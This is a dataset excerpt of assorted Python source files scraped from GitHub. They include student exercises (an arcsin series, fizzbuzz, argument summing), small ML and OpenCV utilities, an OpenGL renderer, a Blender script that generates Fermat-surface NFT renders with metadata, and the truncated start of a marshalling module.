:]\n tst_idx = tst_idx[rnd_tst]\n\n tst_label = tst_labels[rnd_tst, :] if len(tst_labels.shape) > 1 else tst_labels[rnd_tst]\n tst_label_true = labels[tst_idx, :] if len(labels.shape) > 1 else tst_labels[rnd_tst]\n\n if not torch.equal(tst_sample, samples[tst_idx, :]):\n raise RuntimeError(\n \"The splitting of original training set into cw train and test sets have been done \"\n \"incorrectly! A sample does not correspond to one in original dataset\"\n )\n\n if not np.array_equal(tst_label, tst_label_true):\n raise RuntimeError(\n \"The splitting of original training set into cw train and test sets have been done \"\n \"incorrectly! A sample label does not correspond to one in original dataset\"\n )\n\n\ndef return_unique(where_to_find: np.ndarray, what_to_find: np.ndarray) -> np.ndarray:\n \"\"\" Checks intersections between the 1st and the 2nd arrays and return unique values of the 1st array \"\"\"\n intersections = np.intersect1d(where_to_find, what_to_find, return_indices=True)[1].tolist()\n return np.delete(where_to_find, intersections)\n","repo_name":"knodle/knodle","sub_path":"knodle/trainer/wscrossweigh/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"53"} +{"seq_id":"44182404032","text":"'''\r\nFor27. Дано вещественное число X (|X | < 1) и целое число N (> 0). Найти\r\nзначение выражения\r\nX + 1·X 3 /(2·3) + 1·3·X 5 /(2·4·5) + . . . +\r\n+ 1·3·. . .·(2·N−1)·X 2·N +1 /(2·4·. . .·(2·N)·(2·N+1)).\r\nПолученное число является приближенным значением функции arcsin в\r\nточке X.\r\n'''\r\nX = float(input(\"Введите X \"))\r\n\r\nwhile abs(X) > 1:\r\n\tX = float(input(\"Введите X \"))\r\n\r\nN = int(input(\"Введите N \"))\r\n\r\nwhile N <= 0:\r\n\tN = int(input(\"Введите N \"))\r\n\r\nsumm = X\r\n\r\nfor i in range(1,N+1):\r\n\tchislitel = (2 * i - 1) * pow(X, (2*i+1))\r\n\tznamenatel = (2 * i) * (2 * i + 1)\r\n\tsumm += chislitel / znamenatel\r\n\t\r\nprint('=')\r\nprint(summ)\r\n\t\r\n\r\n","repo_name":"666sempron999/Abramyan-tasks-","sub_path":"For(40)/27.py","file_name":"27.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35221134402","text":"import json\nimport difflib\nfrom difflib import SequenceMatcher\nfrom difflib import get_close_matches\n\n# with open('data.json') as f:\n# data = json.load(f)\n\n# opening and loading the data\ndata = json.load(open('data.json'))\n\n# asking user for input\nword = input('Enter word: ' ) \n\n# defining function that returns definition of word if exists\ndef translate(word):\n word = word.lower()\n wierd_w = get_close_matches(word, data.keys())\n ranked_weird = []\n concepts = []\n\n # appending rank of the matches into a list\n for x in wierd_w:\n ranked_weird.append(round(SequenceMatcher(None,word, x).ratio(),2))\n \n while True:\n if word in data.keys():\n [concepts.append(x) for x in data[word]]\n\n print('')\n print('Your word has', len(data[word]), 'concepts. Do you want to see them all or just the first?')\n sel_concepts = input('Reply \"one\", else all concepts will be shown: ')\n print('')\n\n if sel_concepts == 'one':\n return print('Concept: ',concepts[0])\n else:\n for x in range(len(data[word])):\n print('Concept ',x+1,':', concepts[x-1])\n print('')\n break\n\n else:\n print('')\n if len(wierd_w) == 0:\n return 'We didnt find a decent match, try another word'\n \n else:\n print('We found a good match for your word.')\n print(wierd_w)\n print('% of the matching words: ', ranked_weird)\n print('')\n\n print('Is your word in this list? If so select a number in the range 1 -', len(wierd_w), '. Else type \"no\"')\n fixed_word = input()\n\n if fixed_word.isdigit() is True:\n fixed_word = int(fixed_word) - 1\n\n if len(wierd_w) >= fixed_word + 1:\n return print(wierd_w[fixed_word], ':', data[wierd_w[fixed_word]])\n\n elif len(wierd_w) < fixed_word + 1:\n print ('Number out of range')\n\n else:\n return 'Didnt type any number'\n\n elif fixed_word.lower() == 'no':\n return 'Try a different word'\n\n else:\n print('Type a correct number')\n\n\nprint(translate(word))\n# one thing that can be improved is implementing the same distribution of the concepts (in case there's more than one) when the program doesn't find the word in the keys.","repo_name":"CommanderPoe/project-various","sub_path":"01- Interactive Dict/int-dict.py","file_name":"int-dict.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44096488058","text":"import cv2\n\n# 비디오 파일 경로\nvideo_path = \"video0.mp4\"\n\n# 비디오 캡처 객체 생성\ncap = cv2.VideoCapture(video_path)\n\n# 저장할 이미지 파일의 경로 및 이름 설정\nimage_path = \"frames/frame_{}.jpg\" # 이미지 파일의 경로와 이름 패턴\nframe_count = 0 # 프레임 번호 초기화\n\n# 일정 시간 간격 설정 (여기서는 1초마다)\ntime_interval = 1 # 1초 (단위: 초)\n\n# 비디오 프레임 가져오기\nwhile cap.isOpened():\n # 비디오 프레임 읽기\n ret, frame = cap.read()\n\n if ret:\n # 일정 시간 간격마다 프레임 저장\n if frame_count % (time_interval * cap.get(cv2.CAP_PROP_FPS)) == 0:\n # 이미지 파일 경로 생성\n image_file = image_path.format(frame_count)\n\n # 프레임을 이미지로 저장\n cv2.imwrite(image_file, frame)\n print(f\"프레임 {frame_count} 저장 완료.\")\n\n frame_count += 1\n else:\n break\n\n# 자원 해제\ncap.release()\n","repo_name":"Mkpong/License_Plate_Recognition","sub_path":"CNNModel/videotest.py","file_name":"videotest.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21891614022","text":"from sklearn import svm\nimport numpy as np\n\nX = [[0,1,3,2,5], [1,2,5,6,2]]\ny = [0, 1]\n# np.reshape(X,(-1,1))\n# print(X)\nclf = svm.SVC()\nclf.fit(X, y)\nprint(clf.predict([[1,2,4,5,1]]))","repo_name":"AnupKumarJha/ML_algorithm","sub_path":"Part 3 - Classification/Section 17 - Kernel SVM/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"584508688","text":"\"\"\"\nThis package is part of our framework's CORE, which is meant to give flexible support for schedulers from different\nlibraries and frameworks via common abstract wrapper, currently it has support for:\n- pytorch\n\nLearning rate schedulers are functions which adjust current learning rate based on epoch count.\n\"\"\"\n__all__ = [\"get_sheduler_adapter\", \"Scheduler\"]\n\n#\nimport os\nimport importlib\n\n#\nimport torch.nn as nn\n\n#\nfrom innofw.core.schedulers.base import BaseSchedulerAdapter\nfrom innofw.core.optimizers import Optimizer\n\n\ndef factory_method(name):\n return __SCHEDULER_ADAP_DICT__[name]\n\n\n__SCHEDULER_ADAP_DICT__ = dict()\n\n\ndef get_sheduler_adapter(scheduler, optimizer, *args, **kwargs):\n suitable_schedulers = [\n scheduler_adapter\n for scheduler_adapter in __SCHEDULER_ADAP_DICT__.values()\n if scheduler_adapter.is_suitable_input(scheduler)\n ]\n if len(suitable_schedulers) == 0:\n raise NotImplementedError()\n elif len(suitable_schedulers):\n return suitable_schedulers[0](scheduler, optimizer, *args, **kwargs)\n\n\ndef register_scheduler_adapter(name):\n def register_function_fn(cls):\n if name in __SCHEDULER_ADAP_DICT__:\n raise ValueError(\"Name %s already registered!\" % name)\n if not issubclass(cls, BaseSchedulerAdapter):\n raise ValueError(\n \"Class %s is not a subclass of %s\"\n % (cls, BaseSchedulerAdapter)\n )\n __SCHEDULER_ADAP_DICT__[name] = cls\n return cls\n\n return register_function_fn\n\n\nfor file in os.listdir(os.path.dirname(__file__)):\n if file.endswith(\".py\") and not file.startswith(\"_\"):\n module_name = file[: file.find(\".py\")]\n module = importlib.import_module(\n \"innofw.core.schedulers.\" + module_name\n )\n\n\nclass Scheduler(nn.Module):\n \"\"\"\n Class provides same interface for different schedulers by utilizing adapters\n\n Methods\n -------\n step(x)\n updates a learning rate\n \"\"\"\n\n def __init__(self, scheduler, optimizer: Optimizer, *args, **kwargs):\n super().__init__()\n self.scheduler = get_sheduler_adapter(\n scheduler, optimizer, *args, **kwargs\n )\n\n def step(self):\n return self.scheduler.step()\n","repo_name":"InnopolisUni/innofw","sub_path":"innofw/core/schedulers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"32336609742","text":"n = int(input())\r\ncnt = 0\r\nresult = []\r\nfor i in range(1, n):\r\n arr = [n, n - i]\r\n\r\n while 1:\r\n if arr[-2] < arr[-1]:\r\n break\r\n else:\r\n arr.append(arr[-2] - arr[-1])\r\n if cnt < len(arr):\r\n cnt = len(arr)\r\n result = arr\r\nprint(cnt)\r\nprint(*result)\r\n\r\n","repo_name":"KHyeon9/Algorithm_Python","sub_path":"BOJ/Silver/2635.py","file_name":"2635.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34998698304","text":"#!/usr/bin/python3\nif __name__ == \"__main__\":\n import sys\n count = len(sys.argv)\n args = sys.argv\n sum = 0\n if count == 1:\n print(\"0\")\n else:\n for x in args[1:]:\n x = int(x)\n sum += x\n print(sum)\n","repo_name":"mainanorbert/alx-higher_level_programming","sub_path":"0x02-python-import_modules/3-infinite_add.py","file_name":"3-infinite_add.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12880665513","text":"from OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\nimport numpy as np\nfrom config import config\nfrom transformasi import *\nfrom ctypes import *\n\ndef refresh2d():\n glViewport(0, 0, config.width, config.height)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glOrtho(config.curMinX, config.curMaxX,\n config.curMinY, config.curMaxY, -10, 10)\n glMatrixMode(GL_MODELVIEW)\n gluLookAt(config.camX2D, config.camY2D, config.camZ2D, 0, 0, 0, 0, 1, 0)\n\n\ndef refresh3d():\n glViewport(0, 0, config.width, config.height)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glOrtho(config.curMinX, config.curMaxX,\n config.curMinY, config.curMaxY, -100, 100)\n glMatrixMode(GL_MODELVIEW)\n gluLookAt(config.vecCam3D.item(0), config.vecCam3D.item(\n 1), config.vecCam3D.item(2), 0, 0, 0, 0, 1, 0)\n\n\ndef garis(startX, startY, startZ, finishX, finishY, finishZ):\n glBegin(GL_LINES)\n glVertex3f(startX, startY, startZ)\n glVertex3f(finishX, finishY, finishZ)\n glEnd()\n\n\ndef gambarSumbu(is3D):\n if(is3D):\n glLineWidth(4)\n # Sumbu Negatif\n glColor3f(1, 1, 1)\n garis(config.curMinX, 0, 0, 0, 0, 0)\n garis(0, config.curMinY, 0, 0, 0, 0)\n garis(0, 0, config.curMinZ, 0, 0, 0)\n # Sumbu Positif\n glColor3f(1, 0, 0)\n garis(0, 0, 0, config.curMaxX, 0, 0)\n glColor3f(0, 1, 0)\n garis(0, 0, 0, 0, config.curMaxY, 0)\n glColor3f(0, 0, 1)\n garis(0, 0, 0, 0, 0, config.curMaxZ)\n glLineWidth(1)\n else:\n glLineWidth(4)\n glColor3f(1, 1, 1)\n garis(config.curMinX, 0, 0, config.curMaxX, 0, 0)\n garis(0, config.curMinY, 0, 0, config.curMaxY, 0)\n glLineWidth(1)\n\n\ndef gambarGrid(is3D):\n xy, xz, yz = config.xy, config.xz, config.yz\n if(is3D):\n dX = config.curMaxX-config.curMinX\n dY = config.curMaxY-config.curMinY\n dZ = config.curMaxZ-config.curMinZ\n gridX, gridY, gridZ = np.ceil(dX/10), np.ceil(dY/10), np.ceil(dZ/10)\n\n for i in range(6):\n # XY\n '''\n glColor3f(xy[0],xy[1],xy[2])\n garis(config.curMinX, i*gridY, 0, config.curMaxX, i*gridY, 0)\n garis(config.curMinX, -i*gridY, 0, config.curMaxX, -i*gridY, 0)\n '''\n\n # XZ\n glColor3f(xz[0], xz[1], xz[2])\n garis(config.curMinX, 0, i*gridZ, config.curMaxX, 0, i*gridZ)\n garis(config.curMinX, 0, -i*gridZ, config.curMaxX, 0, -i*gridZ)\n for i in range(6):\n # XY\n '''\n glColor3f(xy[0],xy[1],xy[2])\n garis(i*gridX, config.curMinY, 0, i*gridX, config.curMaxY, 0)\n garis(-i*gridX, config.curMinY, 0, -i*gridX, config.curMaxY, 0)\n '''\n\n # YZ\n '''\n glColor3f(yz[0],yz[1],yz[2])\n garis(0, config.curMinY, i*gridZ, 0, config.curMaxY, i*gridZ)\n garis(0, config.curMinY, -i*gridZ, 0, config.curMaxY, -i*gridZ)\n '''\n for i in range(6):\n # XZ\n glColor3f(xz[0], xz[1], xz[2])\n garis(i*gridX, 0, config.curMinZ, i*gridX, 0, config.curMaxZ)\n garis(-i*gridX, 0, config.curMinZ, -i*gridX, 0, config.curMaxZ)\n\n # YZ\n '''\n glColor3f(yz[0],yz[1],yz[2])\n garis(0, i*gridY, config.curMinZ, 0, i*gridY, config.curMaxZ)\n garis(0, -i*gridY, config.curMinZ, 0, -i*gridY, config.curMaxZ)\n '''\n else:\n glColor3f(xy[0], xy[1], xy[2])\n dX = config.curMaxX-config.curMinX\n dY = config.curMaxY-config.curMinY\n gridX, gridY = np.ceil(dX/10), np.ceil(dY/10)\n for i in range(10):\n garis(config.curMinX, i*gridY, 0, config.curMaxX, i*gridY, 0)\n garis(config.curMinX, -i*gridY, 0, config.curMaxX, -i*gridY, 0)\n for i in range(10):\n garis(i*gridX, config.curMinY, 0, i*gridX, config.curMaxY, 0)\n garis(-i*gridX, config.curMinY, 0, -i*gridX, config.curMaxY, 0)\n glColor3f(1, 1, 1)\n\ndef gambarText(x,y,teks,font=GLUT_BITMAP_HELVETICA_12):\n #Warna teks\n glColor3f(1,1,1)\n #Print per char\n glWindowPos2f(x,config.height-y-12)\n for c in teks:\n glutBitmapCharacter(font,c_int(ord(c)))\n\ndef bulat(x,presisi):\n temp = 10**((presisi+1))\n return int(x*temp)/temp\n\ndef draw():\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glLoadIdentity()\n if(config.is3D):\n refresh3d()\n else:\n refresh2d()\n\n config.objTest.gambar()\n gambarGrid(config.is3D)\n gambarSumbu(config.is3D)\n #Gambar koordinat\n gambarText(0,0,\"Koordinat Vektor :\")\n y = 12\n for i in config.objTest.listVertex:\n teks = \"Koordinat ke-\"+str(int(y/12))+\" : <\"+str(bulat(i.item(0),3))+\", \"+str(bulat(i.item(1),3))+\", \"+str(bulat(i.item(2),3))+\">\"\n gambarText(0,y,teks)\n y += 12\n # Sampe sini\n glutSwapBuffers()\n","repo_name":"AdityaPutraS/Tubes-Algeo-2","sub_path":"src/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72707808168","text":"#!/usr/bin/python3\n\n# Fizzbuzz via if/elif/else\n\n# arg = int(input(\"Enter number: \"))\n\narg = 21\n\nfor i in range(1, arg + 1):\n if i % 3 == 0 and i % 5 == 0:\n print(\"Fizzbuzz\")\n elif i % 3 == 0:\n print(\"Fizz\")\n elif i % 5 == 0:\n print(\"Buzz\")\n else:\n print(i)\n","repo_name":"bashM0nk3y/bin","sub_path":"python-test/fizzbuzz/fizzbuzz_if-else.py","file_name":"fizzbuzz_if-else.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26904827135","text":"import bpy, hashlib, pprint\r\nimport cmath, json, time, numpy\r\nimport random as r\r\nimport numpy as np\r\nfrom math import sin, cos, sinh, cosh, pi\r\nfrom mathutils import Vector\r\n\r\n#BASE FUNCTIONS\r\ndef calcZ1(x, y, k, n):\r\n value = cmath.exp(1j*(2*cmath.pi*k/n)) * (cmath.cosh(x+y*1j))**(2/n)\r\n if ( abs(value.real) < 0.061171462611008 and abs(value.imag) < 0.061171462611008 ):\r\n value = 0 + 0j\r\n return value\r\n\r\ndef calcZ2(x, y, k, n):\r\n value = cmath.exp(1j*(2*cmath.pi*k/n)) * (1 / 1j) * (cmath.sinh(x+y*1j))**(2/n)\r\n if ( abs(value.real) < 0.061171462611008 and abs(value.imag) < 0.061171462611008 ):\r\n value = 0 + 0j\r\n return value\r\n\r\ndef calcZ1Real(x, y, k, n):\r\n return (calcZ1(x, y, k, n)).real\r\n\r\ndef calcZ2Real(x, y, k, n):\r\n return (calcZ2(x, y, k, n)).real\r\n\r\ndef calcZ(x, y, k1_, k2_, n1_, n2_, a_):\r\n scale_a = 1\r\n z1 = calcZ1(x, y, k1, n1_)\r\n z2 = calcZ2(x, y, k2, n2_)\r\n return z1.imag * cos(a_/scale_a) + z2.imag*sin(a_/scale_a)\r\n\r\n#METADATA STANDARD\r\nmetadata = {\r\n \"id\": 0,\r\n \"Name\": \"name\",\r\n \"DNA\": \"datahash\",\r\n \"n1\": 2,\r\n \"n2\": 2,\r\n \"Random angle\": 0,\r\n \"Random Texture\": 0,\r\n \"Random RGB\": 0,\r\n \"Random noise\": 0,\r\n \"Scarcity\": 0,\r\n \"dev\": {\r\n \"rend_mode\": \"Cycles 64 256 22\",\r\n \"res\": \"1920x1920\",\r\n \"dim\": 0\r\n }\r\n}\r\n\r\n#INITIAL TIME\r\nt0=time.time()\r\nseed=0000\r\n\r\n#QUALITY\r\ndim = 101\r\nvideo_mode = False\r\nmd_dev = metadata[\"dev\"]\r\nmd_dev[\"dim\"] = dim\r\n\r\n#PARAMS\r\nN_min = 3\r\nN_max = 16\r\nmat_max = 6\r\ncreated=(N_max-N_min)*(N_max-N_min)*mat_max\r\ncolor_index = 0\r\nindex_list = []\r\nmetadata_F_PATH = \"\"\r\nimages_F_PATH = \"\"\r\n\r\n\r\n#TEX SELECTION\r\ntmp_1 = 0\r\ntmp_2 = 0 \r\ntmp_3 = 0\r\ntmp_4 = 0 \r\ntmp_5 = 0\r\ngo = True\r\nprob=[]\r\nweigth = [1,1.5,2,2.5,3,3.5,4,4.5,5,5.5,6,6.5]\r\nrgb = [1,2,3,4,5,6]\r\nlen_wei = len(weigth)\r\ntot_wei = sum(weigth)\r\n\r\nfor i in range(0,len_wei):\r\n prob.append(weigth[i]/tot_wei)\r\n\r\nfor i in range(0,1014):\r\n index_list.append(i+1)\r\n \r\n\r\n#TEX SELECTION\r\ndef tex_selection():\r\n global weigth, len_wei, prob, go, tmp_1, tmp_2,tmp_3,tmp_4,tmp_5\r\n scar_rate = 0\r\n partial=0\r\n to_find=True\r\n rand = r.random() \r\n \r\n for i in range(0,len_wei):\r\n condition = tmp_1 != weigth[len_wei-1-i] and tmp_2 != weigth[len_wei-1-i] and tmp_3 != weigth[len_wei-1-i] and tmp_4 != weigth[len_wei-1-i] and tmp_5 != weigth[len_wei-1-i]\r\n if(rand < prob[i]+partial):\r\n if(to_find):\r\n if(condition):\r\n scar_rate = weigth[len_wei-1-i]\r\n to_find=False\r\n go = False\r\n if tmp_1==0:\r\n tmp_1=scar_rate\r\n else:\r\n if tmp_2==0:\r\n tmp_2=scar_rate\r\n else:\r\n if tmp_3==0:\r\n tmp_3=scar_rate\r\n else:\r\n if tmp_4==0:\r\n tmp_4=scar_rate\r\n else:\r\n tmp_5=scar_rate \r\n else:\r\n partial+=prob[i]\r\n \r\n return scar_rate\r\n\r\n#MATERIAL IMAGE\r\nmaterial_I = bpy.data.materials.new(name='material_I')\r\nmaterial_I.use_nodes = True\r\nmat_nodes_I = material_I.node_tree.nodes\r\nmat_links_I = material_I.node_tree.links\r\nprinc_BSDF_I = mat_nodes_I['Principled BSDF']\r\nprinc_BSDF_I.inputs[4].default_value = 0.5\r\nimage_tex = mat_nodes_I.new('ShaderNodeTexImage')\r\nimage_tex.projection ='FLAT'\r\nimage_tex.interpolation ='Smart'\r\nnoise_tex_I = mat_nodes_I.new('ShaderNodeTexNoise')\r\ncombine_tex_I = mat_nodes_I.new('ShaderNodeCombineRGB')\r\nseparate_tex_I = mat_nodes_I.new('ShaderNodeSeparateRGB')\r\nmat_links_I.new(noise_tex_I.outputs['Color'],image_tex.inputs['Vector'])\r\nmat_links_I.new(image_tex.outputs['Color'],separate_tex_I.inputs['Image'])\r\nmat_links_I.new(combine_tex_I.outputs['Image'],princ_BSDF_I.inputs['Base Color'])\r\ns_red = separate_tex_I.outputs[0]\r\ns_green = separate_tex_I.outputs[1]\r\ns_blue = separate_tex_I.outputs[2]\r\nc_red = combine_tex_I.inputs[0]\r\nc_green = combine_tex_I.inputs[1]\r\nc_blue = combine_tex_I.inputs[2]\r\n\r\n#RANGE\r\nx = np.linspace(0, pi/2, dim)\r\ny = np.linspace(-pi/2, pi/2, dim)\r\nx, y = np.meshgrid(x, y)\r\n\r\n#INIT RANDOM\r\nr.seed(a=seed)\r\n\r\nfor n1 in range(N_min,N_max):\r\n for n2 in range(N_min,N_max):\r\n tmp_1 = 0\r\n tmp_2 = 0 \r\n tmp_3 = 0\r\n tmp_4 = 0 \r\n tmp_5 = 0\r\n for mat in range(0,mat_max): \r\n tp0=time.time()\r\n color_index +=1\r\n \r\n ### RANDOM ### ANGLE SELECTION\r\n angle_r = ( (pi/8) + r.random()*(pi/4) ) % (pi/4)\r\n a_radian = angle_r\r\n\r\n################################# START #################################\r\n\r\n #INIT MESH DATA\r\n verts = [[]]\r\n edges = [[]]\r\n edge_set = []\r\n faces = [[]]\r\n face_set = []\r\n\r\n #BUILD\r\n for i in range(n1*n2):\r\n edge_set.append(set())\r\n face_set.append(set())\r\n\r\n count = 0\r\n for k1 in range(n1):\r\n for k2 in range(n2):\r\n # calc X, Y, Z values\r\n X = np.frompyfunc(calcZ1Real, 4, 1)(x, y, k1, n1).astype('float32')\r\n Y = np.frompyfunc(calcZ2Real, 4, 1)(x, y, k2, n2).astype('float32')\r\n Z = np.frompyfunc(calcZ, 7, 1)(x, y, k1, k2, n1, n2, a_radian).astype('float32')\r\n\r\n X_ = X.flatten()\r\n Y_ = Y.flatten()\r\n Z_ = Z.flatten()\r\n \r\n v = []\r\n for x1, y1, z1 in zip(X_, Y_, Z_):\r\n v.append(((float(x1), float(y1), float(z1))))\r\n verts[0].extend(v)\r\n \r\n for i in range(dim * dim):\r\n y_index = i / dim\r\n x_index = i % dim\r\n j = i + count * dim * dim\r\n if (y_index < dim - 1) and (x_index < dim - 1):\r\n edge_set[count].add(tuple(sorted([j, j+dim])))\r\n edge_set[count].add(tuple(sorted([j+dim, j+dim+1])))\r\n edge_set[count].add(tuple(sorted([j+dim+1, j+1])))\r\n edge_set[count].add(tuple(sorted([j+1, j])))\r\n face_set[count].add(tuple(([j, j+dim, j+dim+1, j+1])))\r\n \r\n count += 1\r\n\r\n for i in range(n1*n2):\r\n edges[0].extend(list(edge_set[i]))\r\n faces[0].extend(list(face_set[i]))\r\n \r\n################################# END #################################\r\n\r\n #MESH & SMOOTH\r\n mymesh = bpy.data.meshes.new(\"Fermat-Surface\")\r\n myobject = bpy.data.objects.new(\"Fermat-Surface\",mymesh)\r\n bpy.context.collection.objects.link(myobject)\r\n mymesh.from_pydata(verts[0],edges[0],faces[0])\r\n n_poly = len(myobject.data.polygons)\r\n for i in range(n_poly):\r\n myobject.data.polygons[i].use_smooth = True\r\n \r\n #DEL\r\n del(edge_set)\r\n del(face_set)\r\n del(verts)\r\n del(edges)\r\n del(faces)\r\n print(\"Memory cleaned\")\r\n\r\n #ROTATION\r\n frame_number = 0\r\n for i in range(0,360):\r\n angle = i*(2*pi/360)\r\n \r\n bpy.context.scene.frame_set(frame_number)\r\n myobject.rotation_euler[2] = angle\r\n myobject.keyframe_insert(data_path=\"rotation_euler\",index = -1)\r\n frame_number += 1\r\n \r\n ######################## MATERIAL ######################## \r\n \r\n #TEX SELECTION\r\n go = True\r\n while(go):\r\n scar_rate = tex_selection()\r\n\r\n #SEPARATE AND COMBINE RGB\r\n rand = r.choice(rgb)\r\n if ( rand == 1 ):\r\n mat_links_I.new(s_red,c_red)\r\n mat_links_I.new(s_green,c_green)\r\n mat_links_I.new(s_blue,c_blue)\r\n\r\n if ( rand == 2 ):\r\n mat_links_I.new(s_red,c_green)\r\n mat_links_I.new(s_green,c_red)\r\n mat_links_I.new(s_blue,c_blue)\r\n\r\n if ( rand == 3 ):\r\n mat_links_I.new(s_red,c_blue)\r\n mat_links_I.new(s_green,c_green)\r\n mat_links_I.new(s_blue,c_red)\r\n\r\n if ( rand == 4 ):\r\n mat_links_I.new(s_red,c_red)\r\n mat_links_I.new(s_green,c_blue)\r\n mat_links_I.new(s_blue,c_green)\r\n \r\n if ( rand == 5 ):\r\n mat_links_I.new(s_red,c_blue)\r\n mat_links_I.new(s_green,c_red)\r\n mat_links_I.new(s_blue,c_green)\r\n \r\n if ( rand == 6 ):\r\n mat_links_I.new(s_red,c_green)\r\n mat_links_I.new(s_green,c_blue)\r\n mat_links_I.new(s_blue,c_red)\r\n \r\n\r\n #TEX CORR\r\n for i in range(0,len_wei):\r\n if scar_rate == weigth[i]:\r\n tex_name = i+1\r\n \r\n \r\n #APPLY TEXTURE & RANDOM NOISE\r\n myobject.data.materials.append(material_I)\r\n random_noise = 0.5 + 3.5*r.random()\r\n noise_tex_I.inputs[2].default_value = random_noise\r\n image_tex.image = bpy.data.images.load(\"...{}.jpg\".format(tex_name))\r\n\r\n \r\n #SCARCITY RATING\r\n scarcity = scar_rate + 1 \r\n if(n1==n2):\r\n scarcity+=12 \r\n\r\n #ID CHOICE\r\n id = r.choice(index_list)\r\n for i in range(0,len(index_list)):\r\n if (id == index_list[i]):\r\n to_del=i\r\n del index_list[to_del]\r\n\r\n #DNA\r\n string_name = str(id) + str(n1) + str(n2) + str(scar_rate) + str(rand) + \"secret key word\"\r\n data_hash = hashlib.sha256(string_name.encode('ascii')).hexdigest()\r\n \r\n #SAVE METADATA \r\n metadata[\"id\"] = id \r\n metadata[\"Name\"] = \"Fermat-Surface {}{}{}{}\".format(n1,n2,tex_name,rand)\r\n metadata[\"DNA\"] = str(data_hash)\r\n metadata[\"n1\"] = n1\r\n metadata[\"n2\"] = n2\r\n metadata[\"Random angle\"] = angle_r\r\n metadata[\"Random Texture\"] = tex_name\r\n metadata[\"Random RGB\"] = rand\r\n metadata[\"Random noise\"] = random_noise\r\n metadata[\"Scarcity\"] = scarcity\r\n file_name = str(n1) + str(n2) +str(tex_name) + str(rand)\r\n string = metadata_F_PATH + \"{}_{}_metadata.json\".format(id,file_name)\r\n f = open(string,'w')\r\n json.dump(metadata,f,indent=4)\r\n f.close()\r\n \r\n #CONSOLE LOG\r\n print(\"Number: {}/{}\".format(color_index,created))\r\n pprint.pprint(metadata)\r\n \r\n #RENDER\r\n scene = bpy.context.scene\r\n string = images_F_PATH + \"{}_{}_Fermat\".format(id,file_name)\r\n scene.render.filepath = string \r\n bpy.ops.render.render(animation=video_mode,write_still=True)\r\n\r\n #CONSOLE LOG\r\n print(\"Completed!\")\r\n tp1=time.time()\r\n dt=(tp1-tp0)/60\r\n print(\"Partial time: {}\".format(dt))\r\n \r\n #DEL RENDERED SPACE\r\n bpy.data.objects.remove(scene.objects['Fermat-Surface'],do_unlink=True)\r\n \r\n\r\n#CONSOLE LOG\r\nt1=time.time()\r\ndt=(t1-t0)/60\r\nprint(\"Created {} with dim {} in: {} min\".format(created,dim,dt))\r\n","repo_name":"Federico-Anastasi/NFTs","sub_path":"Fermat-Surfaces/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74528049448","text":"import os\nimport shutil\nimport random\n\ndef copy_random_files(source_folder, destination_folder, percentage):\n # Get a list of all files in the source folder\n file_list = os.listdir(source_folder)\n \n # Calculate the number of files to copy (30% of the total files)\n num_files_to_copy = int(len(file_list) * percentage)\n\n #num_files_to_copy = 741\n\n print(f'num_files_to_MOVE={num_files_to_copy}')\n\n print(f'From {source_folder_path} to {destination_folder_path}')\n\n input(\"Press any key to continue...\")\n\n \n # Randomly select 'num_files_to_copy' files from the file list\n selected_files = random.sample(file_list, num_files_to_copy)\n \n # Copy selected files to the destination folder\n for filename in selected_files:\n source_path = os.path.join(source_folder, filename)\n destination_path = os.path.join(destination_folder, filename)\n\n print(destination_path)\n shutil.move(source_path, destination_path)\n\n# Set the source and destination folder paths with forward slashes (/)\nsource_folder_path = r'H:\\My Drive\\robocar\\dataset\\kitti\\val\\images'\ndestination_folder_path = r'H:\\My Drive\\robocar\\dataset\\kitti\\test\\images'\n\n\n# Specify the percentage of files to copy (30%)\npercentage_to_copy = 0.5\n\n# Call the function to copy random files\ncopy_random_files(source_folder_path, destination_folder_path, percentage_to_copy)\n","repo_name":"druv01/yolov8or5","sub_path":"utilities/train_validate_split.py","file_name":"train_validate_split.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74423285287","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nfile: marshal.py\ndescription: Tools for marshalling objects / data around\nauthor: Luke de Oliveira (lukedeo@vaitech.io)\n\"\"\"\n\n\n\nfrom future import standard_library\n\nstandard_library.install_aliases()\n\nimport sys\n\nfrom builtins import bytes\nfrom builtins import str\nfrom builtins import object\n\nfrom pickle import (dumps as _dumps, loads as _obj_from_pkl_string,\n HIGHEST_PROTOCOL as _hp, PicklingError)\n\nfrom functools import partial\nimport gzip\nfrom json import dumps as _obj_to_json_string, loads as _obj_from_json_string\nimport 